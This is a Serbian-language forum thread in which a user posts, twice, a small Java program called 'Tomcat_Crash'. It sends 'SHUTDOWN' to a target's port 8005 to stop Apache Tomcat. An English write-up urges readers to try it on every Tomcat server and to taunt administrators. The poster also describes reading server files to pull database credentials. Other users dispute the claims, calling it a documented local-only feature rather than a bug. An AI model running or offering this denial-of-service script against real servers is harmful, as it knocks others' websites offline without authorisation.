[ weB_KiLeR @ 17.01.2003. 18:42 ] @
Nasao sam nekoliko bug-ova na tomcat-u...
Uglavnom vam prezentiram prvi:
Citat:

/*Coded by Mil0s 2.1.2001.
mail: [email protected]
ICQ : 106635840*/

//Imports
import java.io.*;
import java.net.*;

public class Tomcat_Crash
{
public static void main(String[] args)
throws IOException {
/*
*Declarations
*/
int PORT= 8005;
String adress = null;
Socket socket = null;
/*
*Check the comamnd line for url
*/
if (args.length != 1)
{
System.out.print( "*****************************************************************************\n"
+"************Tomcat_Crash the first Tomcat exploit coded by Mil0s*************\n"
+"*****************************************************************************\n"
+"+------------------------+\n"
+"|mail: [email protected]|\n"
+"|ICQ uin: 106635840 |\n"
+"|site: www.coders.co.yu |\n"
+"+------------------------+\n");

System.out.println("Usage: java Tomcat_Crash <adress>");
return;
}else
adress = args[0];
try
{
socket = new Socket(adress,PORT);
/*
*Connecting to it and crashing it ...
*/
System.out.println("Connecting on" + adress + "\n" +"Crashing it...");
PrintWriter out =
new PrintWriter(
new BufferedWriter(
new OutputStreamWriter(
socket.getOutputStream())),true);
out.println("SHUTDOWN");
System.out.println("Tomcat is crashed :-)");
}//End of try
catch (IOException e)
{
System.out.println("Cannot connect on " + adress
+"check if you type adress correctly if you get this message again then the system is not vulnerable");
}

}//End of main

}//End of programm


To je bio kod a ovde imate objasnjeno:

[quote]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***********Tomcat_Crash source code explaind***********
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Where is a bug???
Heh here it is:
<Server port="8005" shutdown="SHUTDOWN" debug="0">
Yes it is from server.conf what this line does???
Let's look at my source code :


/*Coded by Mil0s 2.1.2001.
mail: [email protected]
ICQ : 106635840*/

//Imports
import java.io.*;
import java.net.*;

public class Tomcat_Crash
{
public static void main(String[] args)
throws IOException {
/*
*Declarations
*/
int PORT= 8005;
String adress = null;
Socket socket = null;
/*
*Check the comamnd line for url
*/
if (args.length != 1)
{
System.out.print( "*****************************************************************************\n"
+"************Tomcat_Crash the first tomcat exploit coded by Mil0s*************\n"
+"*****************************************************************************\n"
+"+------------------------+\n"
+"|mail: [email protected]|\n"
+"|ICQ uin: 106635840 |\n"
+"|site: www.coders.co.yu |\n"
+"+------------------------+\n");

System.out.println("Usage: java Tomcat_Crash <adress>");
return;
}else
adress = args[0];
try
{
socket = new Socket(adress,PORT);
/*
*Connecting to it and crashing it ...
*/
System.out.println("Connecting on" + adress + "\n" +"Crashing it...");
PrintWriter out =
new PrintWriter(
new BufferedWriter(
new OutputStreamWriter(
socket.getOutputStream())),true);
out.println("SHUTDOWN");
System.out.println("Tomcat is crashed :-)");
}//End of try
catch (IOException e)
{
System.out.println("Cannot connect on " + adress
+"check if you type adress correctly if you get this message again the then system is not vulnerable");
}

}//End of main

}//End of programm

Yeah code is little :-) hehe...
out.println("SHUTDOWN"); -> this pice of code is whole exploit only thing you must do is to connect on port 8005 on host that have tomcat for webserver and then type "SHUTDOWN" without ""...
Pretty dumm heh whell many of admin's are dumm so you try that on evry server who got tomcat and remember if you crash a tomcat whole web server is crashed :)
Sure you can play mouse and cats with sys Admin's beacuse they will not know how that happend ;)

|++++++++++++++++++++++++++++++++++++++++++++|
|coded by Mil0s |
|mail:[email protected] |
|ICQ: 106635840 |
|++++++++++++++++++++++++++++++++++++++++++++|
[ B o j a n @ 17.01.2003. 23:41 ] @
Lepo l;)

Zasto ne bi objavio tu slabost na bugtraq-u, ili nekoj slicnoj security listi.
[ BobMarley @ 18.01.2003. 01:06 ] @
... ponosno predstavlja remek djelo exploit(u javi), tako kompliciran da smo ga i objasnili... :D ... i stvarno zahtjeva dobro napisan exploit code da bi mogli izvesti ..


sta to je The first tomcat exploit ?
http://online.securityfocus.com/cgi-bin/sfonline/vulns.pl
potrazi apache software foundation / tomcat


p.s. engleski prva liga .... kao i uvijek
[ BobMarley @ 18.01.2003. 01:42 ] @
najnovije u svijetu hehe .... http://www.google.com/search?h...hutdown&btnG=Google+Search

kako kaze Bill "to nije ranjivost nego opcija"

... e kileru ti kada se pojavis uvijek neki smijeh ...
jesi to otkrio ranjivost na svom webserveru na svojoj masini ? jer na taj port se moze pristupiti samo sa masine na kojoj je pokrenut webserver ...
Ali eto samo malo koda jos napisi i pretvori exploit u "local exploit"
[ weB_KiLeR @ 18.01.2003. 15:57 ] @
Slusaj taj exploit radi preko mreze bar je radio kad sam ga ja probao...
Da je radio samo iz locala nebih ga ni napisao ...
Uglavnom tomcat ima bug da mozete preko servleta/jsp-a da listate sve direktorijume da otvarate sve file-ove na kompu i tako dalje...
A kad mozete da otvarate file-ove mozete sve :-)
ta uzmete class-u da je decompile-irate i nadjete user i pass gde se on konektuje na mySQL itd...
Shvatate sta hocu da kazem...
[ weB_KiLeR @ 18.01.2003. 16:03 ] @
Citat:
BobMarley:
sta to je The first tomcat exploit ?


Znas ti kad sam ja to napisao ???
Tada kad sam trazio nisam nasao ni jedan exploit za tomcat ...
I nemoj vise da seres!!!
To je napisano odavno a evo sad sam ga stavio ovde iz cimanja inace do dzedzi na mom kompu vise od godinu dana...
[ Floyd @ 18.01.2003. 16:13 ] @
Sto nisi stavio pre godinu dana?
[ BobMarley @ 18.01.2003. 18:00 ] @
instant hacker ! ($2.99)

[ B o j a n @ 19.01.2003. 08:06 ] @
Citat:
weB_KiLeR:
A kad mozete da otvarate file-ove mozete sve :-)


O, ne !

Ovo je stvarno bilo diskreditivno.
A ja sam pomislio ... nah, lock it.
[ c00l_daem0n @ 19.01.2003. 21:11 ] @

[/quote]

Znas ti kad sam ja to napisao ???
Tada kad sam trazio nisam nasao ni jedan exploit za tomcat ...
I nemoj vise da seres!!!
To je napisano odavno a evo sad sam ga stavio ovde iz cimanja inace do dzedzi na mom kompu vise od godinu dana...[/quote]

Ajde sad... nemoj jos vise da se glupiras, priznaj lepo i zdravo.
Svakom se moze desiti, jednostavno nisi bio dovoljno upucen u tomcat, pa sta.
Toliko je ocigledno da si se presao, da sad ovo izvlacenje je sasvim suvisno i glupo.

pozdrav.



[ BobMarley @ 19.01.2003. 22:45 ] @
necu ja da ti "serem", ali shvati da TI NISI nasao BUG u tomcatu niti prije godinu dana niti sada ....

to sto ti sada tu valjas su mogucnosti tomcata ... tomcat omogucuje da ga sa localne masine ugasis preko tog porta i to je to ....

ali ajde mozda netko bude koristio tvoj exploit ako si bude htio ugasiti masinu, sam sebi.

a koja su ta druga dva sto si isto nasao ?
[ weB_KiLeR @ 24.01.2003. 13:42 ] @
Nemam ja sta da priznajem blah blah blah ja sam probao na umrezenim masinama pod win-om i radilo je verovao ti ili ne ko ne veruje nek dodje do mene i pokazacu mu ...
Uglavnom mozete preko servlet-a da listate direktorijume na hard disku i da otvarate sve file-ove...
[ alex @ 24.01.2003. 15:07 ] @
Cekaj, web_Killer, hoces da kazes da si nasao bug po kome servlet instaliran na serveru moze da cita fajlove sa tog servera?
[ 01011011 @ 27.01.2003. 22:03 ] @
Nije vam fer ljudi,
zar niko ne vjeruje da bi neko nas mogao da napise exploit?
Glupost...ne kontam koja je poenta vas koji mislite da ste bolji od web killera, on je barem nesto prikazao, a vi????

Ajde malko tisinica :)
[ BobMarley @ 27.01.2003. 23:18 ] @
01itd.

nemoj da pricas ako ne razumijes , ili nisi bas dobro procitao o cemu se radi, blamira se on blamiras se ti koji to podrzavas, blam za Java forum kojemu ovako i onako ne ide bas najbolje u zadnje vrijeme..... jednostavno obrisite ovu najblaze receno "glupost" ... i rijesen slucaj ...
[ kobrejabre @ 27.01.2003. 23:31 ] @
Citat:
alex:
Cekaj, web_Killer, hoces da kazes da si nasao bug po kome servlet instaliran na serveru moze da cita fajlove sa tog servera?

Alex je pogodio poentu.

Dakle, ne poricem da se mali killer trudi da nesto nauci, za njegove godine nije ni los, ali ova tema je bas ispala smesna.
Dakle, on je nasao 'bug' po kome servlet moze da cita i otvara fajlove?... Pa to je sasvim normalno, ali stvar je u sledecem: kako bi ti, killeru, postavio SVOJ sarvlet na MOJ (ili bilo ciji tudji) web server pa da citas i otvaras fajlove. E, kad bi taj nacin nasao, onda bi mogao da kazes da si nasao bug. Ovako, samo se blamiras...
[ 01011011 @ 28.01.2003. 19:39 ] @
Citat:
BobMarley:
01itd.

nemoj da pricas ako ne razumijes , ili nisi bas dobro procitao o cemu se radi, blamira se on blamiras se ti koji to podrzavas, blam za Java forum kojemu ovako i onako ne ide bas najbolje u zadnje vrijeme..... jednostavno obrisite ovu najblaze receno "glupost" ... i rijesen slucaj ...



Ja se care ne blamiram, nego mi izgleda da je ovaj forum postao k**** u zadnje vrijeme i svi se nesto pale kao da znaju a niko nista ne zna, i svako pokusava da disuje svakoga, ne kontam koja je poenta... ??? Ja ne podrzavam WebKillera, jednostavno nisam u tom fazonu, h4cker wannabe, ali kazem da se manete, ukoliko covjek to voli neka trazi code po interenetu, pise svoje ime i postuje pustite ga... Ne mora doma neko da se napravi pametan da pocme da disuje, mislim koji smo mi srbi narod... Treba nas unistiti matere mi...
[ BobMarley @ 28.01.2003. 22:54 ] @
ti ne razumjes jednu stvar , uopce nije fazno sada da li je neko u nekakvom fazonu ili ne , i ne raspravlja se o tome sta su hakeri, kako biti bla bla bla .. to su dosadne izlizane teme ... nesto drugo je tema tu procitaj sve postove pa ces skuziti ....
[ 01011011 @ 29.01.2003. 00:37 ] @
ait dawg nek ti bude...
[ spartak @ 16.02.2003. 22:54 ] @
Citat:
01011011:
Treba nas unistiti matere mi...


??? :-(